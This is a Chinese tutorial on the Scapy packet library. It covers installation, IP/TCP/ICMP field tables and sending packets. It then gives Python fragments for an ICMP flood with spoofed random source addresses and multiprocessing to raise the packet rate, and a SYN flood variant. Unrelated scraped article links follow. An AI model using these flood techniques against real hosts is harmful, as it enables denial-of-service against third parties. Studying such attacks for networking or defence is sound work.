Scapy功能介绍以及应用
介绍
- 首先给出官网。
Scapy
是用Python
编写的交互式数据包处理工具。- 使用
Scapy
可以伪造或解码各种协议的数据包,在线发送它们,捕获它们,匹配请求和答复等等。
下载
- 由于是
Python
编写的,使用pip install
进行安装,这里使用清华源加速。
pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple
- 直接使用
scapy
命令打开,若显示无法导入相关库,则对其中缺失的相关包进行安装。
INFO: Can't import matplotlib. Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
使用
包配置
- 使用
TCP/IP
协议构造基本数据包,这里调用了Scapy
的内置函数IP()
和TCP()
。
pkt = IP()/TCP()
注意:
IP()
一定在TCP()
之前。
IP()
参数解析
参数 | 含义 | 默认值 |
---|---|---|
version | 版本 | 4 |
ihl | 报头长度 | None |
tos | 服务类型 | 0x0 |
len | 报文总长度 | None |
id | 标识符 | 1 |
flags | 标记 | NULL |
frag | 段偏移 | 0 |
ttl | 生存周期 | 64 |
proto | 协议 | tcp |
chksum | 校验和 | None |
src |
源IP 地址
|
127.0.0.1 |
dst |
目的IP 地址
|
127.0.0.1 |
TCP()
参数解析
参数 | 含义 | 默认值 |
---|---|---|
sport | 源端口 | ftp_data |
dport | 目的端口 | http |
seq | 序号 | 0 |
ack | 确认号 | 0 |
dataofs | 数据偏移 | None |
reserved | 保留位 | 0 |
flags | 控制功能 | S |
window | 窗口大小 | 8192 |
chksum | 校验和 | None |
urgptr | 紧急指针 | 0 |
options | 选项 | [] |
- 根据需求设置数据包之后,使用
{PKT_NAME}.show()
可以查看报文信息。
###[ IP ]### version= 4ihl= Nonetos= 0x0len= Noneid= 1flags= frag= 0ttl= 64proto= tcpchksum= Nonesrc= 192.168.239.128dst= 110.242.68.4\options\
###[ TCP ]### sport= ftp_datadport= httpseq= 0ack= 0dataofs= Nonereserved= 0flags= Swindow= 8192chksum= Noneurgptr= 0options= []
包发送
- 使用
send()
函数发送数据包,该函数不返回响应。
>>> send(pkt)
.
Sent 1 packets.
sendp()
等加了p
的函数作用于第二层,发送的是帧。
sr()
和sr1()
发送数据包并接收响应。
>>> res, unans = sr(pkt)
Begin emission:
Finished sending 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> res
<Results: TCP:1 UDP:0 ICMP:0 Other:0>
>>> unans
<Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>
sr()
和sr1()
的区别在于,sr1()
只有一个返回值(Results
)。
Ping DoS
- 使用
Ping
进行DoS
攻击时,由于Ping
使用的是ICMP
协议,下面给出ICMP()
的参数解析。
ICMP()
参数解析
参数 | 含义 | 默认值 |
---|---|---|
type | 消息类型 | echo-request |
code | 代码 | 0 |
chksum | 校验和 | None |
id | 标识 | 0x0 |
seq | 序号 | 0x0 |
Ping
攻击报文的设置比较简单,通过随机配置ICMP()
也能实现Ping DoS
的攻击效果。- 结合
IP()
设置目标主机IP
。
#判断是否随机源
if random_source ==True:#随机构造IPsource_ip = Random_IP()ip_proto = IP(src = source_ip,dst = host,ttl = 1,id = id_ip)
else:ip_proto = IP(dst = host,ttl = 1,id = id_ip)#id_ping和seq_ping均为随机配置icmp_proto = ICMP(id = id_ping,seq = seq_ping)#设置数据内容data = b'ping dos'pkt = ip_proto / icmp_proto / data *100send(pkt)
- 在这基础上,要想达到效果,我们需要增加攻击报文的量。
- 通过循环重复攻击之外,我们采用多进程并发的方式增大攻击频率。
#processes设置太高会影响本机运作,太低起不到干扰效果
def ping_concurrent(host, processes=5, random_source=True):#创建进程池pool = multiprocessing.Pool(processes=processes)while True:try:#选择进程的任务和参数pool.apply_async(ping_times, (host, random_source))except KeyboardInterrupt:pool.terminate()
SYN_Flood
- 多进程和重复次数的性质和
Ping DoS
一致,这里主要的区别在于把ICMP
协议换成了TCP
协议。
# Randomly generate source port
src_port = randint(1,65535)tcp_proto = TCP(sport = src_port,dport = port,flags = "S")pkt = ip_proto / tcp_proto
- 其中
flags
变量表示了TCP
三次握手的不同状态,S
表示SYN
。
Scapy功能介绍以及应用相关推荐
- HiCar基本功能介绍
HiCar基本功能介绍 基本概述 一方面,基于操作系统超强的分布式能力,HUAWEI HiCar通过手机和汽车之间的连接,基于三层标准与能力,构建手机和汽车互助资源池,把手机的服务生态延伸到车内,实现 ...
- vs2008\drivers\opengl_2.h.c_opengl基本功能介绍+示例
/**** openGL上的画点函数 即基本功能介绍 *****/ /***************************************************************** ...
- 大白菜软件常用功能介绍
大白菜软件常用功能介绍 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 一.刻录光盘介绍 1.选择你需要的刻录的光盘 2.点击刻录光盘 3.确认之后点击刻录 4.等待刻录完成 转载于 ...
- Redis Manager 主要功能介绍
GitHub: github.com/ngbdf/redis- Redis Manager 是 Redis 一站式管理平台,支持集群的创建.管理.监控和报警. 集群创建:包含了三种方式 Docker. ...
- 键盘上的F1,F2,……,F12的各功能介绍
键盘上的F1,F2,--,F12的各功能介绍 一般情况下,键盘上有12个功能键,统称为Fn键. F1:如果我们在一个选定的程序或页面中并且需要帮助,那么请按下F1.如果现在不是处在任何程序中,而是处在 ...
- TEASOFT辅助服务程序UDPCopy 功能介绍
简 介: 借助于嵌入式工控机作为音乐伺服器,完成背景音乐输出控制.本文总结了TEASOFT相应的控制命令.除了现在的功能之外,还需要进一步补充MUSIC嵌套功能. 关键词: MUSIC,TEASOFT ...
- iOS Simulator功能介绍关于Xamarin IOS开发
iOS Simulator功能介绍关于Xamarin IOS开发 iOS Simulator功能介绍 在图1.38所示的运行效果中,所见到的类似于手机的模型就是iOS Simulator.在没有iPh ...
- Istio所有模块、Service、Pod的功能介绍
[TOC] Istio所有模块.Service.Pod的功能介绍 Istio模块 Proxy(Envoy) 流量代理,不可缺少 Pilot 服务发现.流量管理.智能路由等 Mixer 遥测相关 Cit ...
- grep 模糊匹配_vim 的模糊查找插件 LeaderF 新功能介绍(二)
前言 本文介绍自<vim 的模糊查找插件 LeaderF 新功能介绍>以后,LeaderF增加的一些新的功能. 异步grep Leaderf rg 此功能已经在<vim的grep插件 ...
最新文章
- 详解随机神经网络结构搜索 (SNAS)
- 强碱性食品 高嘌呤食物
- 华大 MCU 之六 SEGGER Embedded Studio 及 Ozone 使用 Jlink 调试
- spring mvc学习(46):自定义配置类
- Redis 会遇到的「坑」,你踩过几个?
- open() api
- Mac 内存被一个叫Installer的程序大量占用导致 内存严重不足 解决方案
- HDOJ--1875--畅通工程再续
- CorelDRAW X4 SP2 简体中文正式版精简增强版
- Unity2019配置ARCore环境
- 虚拟化平台VMware vCenter Server无法连接故障排查解决
- (附源码)SSM医院人事及科室病区管理JAVA计算机毕业设计项目
- 第二章:Djgo后台管理
- HarmonyOS与Android的全面对比
- mysql ceil_MySQL笔记之数学函数详解_MySQL - ceil
- R语言对推特twitter数据进行文本情感分析
- 计算机的3d打印机,DIY机械计算器,用3D打印技术体验更棒
- 三菱MR-JE-C伺服电机FB功能块 流水线项目,16个MR-JE-C电机
- 零知识证明(Zero—Knowledge Proof)
- 以太网解决方案实现4k/8k资源最大化和 OPEX 最小化